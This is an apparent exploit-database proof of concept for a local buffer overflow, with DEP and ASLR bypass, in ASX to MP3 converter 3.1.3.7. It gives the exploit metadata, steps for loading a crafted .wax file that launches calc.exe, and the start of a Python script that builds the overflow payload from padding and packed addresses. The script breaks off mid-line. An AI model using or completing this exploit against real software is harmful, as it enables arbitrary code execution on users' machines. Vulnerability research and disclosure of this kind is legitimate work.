# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC) # Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true # Exploit Author: Paras Bhatia # Discovery Date: 2020-08-25 # Vulnerable Software: ASX to MP3 converter # Version: 3.1.3.7.2010.11.05 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) # Proof of Concept : # 1.- Run python code: asx_to_mp3_rop_exploit.py # 2.- Works on DEP enabled for ASX2MP3Converter.exe # 3.- Open "ASX2MP3Converter.exe" # 4.- Click on "Load" Button # 5.- Select generated file "asx_to_mp3_rop_exploit.wax". # 6.- Click on "Open". # 7.- Calc.exe runs. ################################################################################################################################################# #Python "asx_to_mp3_rop_exploit.py" Code: import struct file = 'asx_to_mp3_rop_exploit.wax' payload = "http://" payload += "A" * 17417 + struct.pack('